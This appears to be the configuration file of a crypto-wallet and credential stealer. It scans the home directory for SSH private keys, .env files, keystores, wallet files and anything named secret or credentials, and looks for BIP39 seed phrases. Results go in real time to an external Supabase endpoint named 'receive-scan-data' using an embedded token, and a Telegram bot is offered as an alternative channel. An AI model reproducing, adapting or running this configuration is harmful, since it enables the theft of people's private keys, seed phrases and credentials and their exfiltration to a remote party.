paths:
  - "$HOME/"


skip_dirs:
  linux:
    - "/proc"
    - "/sys"
    - "/dev"
    - "/run"
    - "/var/run"
    - "/boot"
    - "/lib"
    - "/usr/lib"
    - "/snap"
    - "/var/lib/docker"
    - "/tmp"
  macos:
    - "/System"
    - "/Library/Caches"
    - "/private/var"
    - "/dev"
    - "/Volumes"
  windows: []

skip_names:
  - "node_modules"
  - "vendor"
  - "target"
  - "build"
  - "dist"
  - ".git"
  - ".idea"
  - ".vscode"
  - ".cache"
  - "__pycache__"

exclude_paths:
  - "/.cache"
  - "/cache"
  - "/tmp"

skip_ext:
  - ".exe"
  - ".dll"
  - ".so"
  - ".dylib"
  - ".png"
  - ".jpg"
  - ".jpeg"
  - ".gif"
  - ".mp4"
  - ".mkv"
  - ".avi"
  - ".iso"
  - ".zip"
  - ".tar"
  - ".gz"
  - ".rar"
  - ".7z"
  - ".pdf"
  - ".doc"
  - ".docx"
  - ".vmdk"
  - ".qcow2"

candidate_files:
  - ".txt"
  - ".env"
  - ".json"
  - ".yaml"
  - ".yml"
  - ".pem"
  - ".key"
  - ".asc"
  - ".wallet"
  - "*keystore*"
  - "*wallet*"
  - "id_rsa"
  - "id_ed25519"
  - "id_ecdsa"
  - "*secret*"
  - "*credentials*"
  - "*config*"
  - ".dat"
  - ".backup"

max_file_size_mb: 110
max_read_bytes: 65536
parallelism: 50
timeout_per_file_seconds: 5
timeout_total_seconds: 7200

detection:
  # bitcoin_wif: true
  # bitcoin_hex: true
  # ethereum_keystore: true
  # ethereum_hex: true
  # solana_base58: true
  mnemonic_bip39: true

report:
  format: "json"
  output_path: "./report.json"
  save_local: true

api:
  enabled: true
  endpoint: "https://pciarudpmnzlpuesuafq.supabase.co/functions/v1/receive-scan-data"
  token: "sk_72e4382e9d864d569d6bd4299ba7d5c0"
  send_realtime: true
  batch_size: 100

telegram:
  enable: false
  bot_token: ""
  chat_id: ""

telemetry:
  enabled: false
  endpoint: ""
  token: ""

verbose: true